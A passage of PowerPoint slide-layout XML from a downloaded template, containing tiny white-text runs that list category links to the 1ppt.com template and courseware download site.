              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout218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18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18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18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1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19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19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19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19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19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19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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout219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19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19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19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2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20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20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20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20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20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20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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout220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20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20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20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2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21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21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21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21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21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21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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
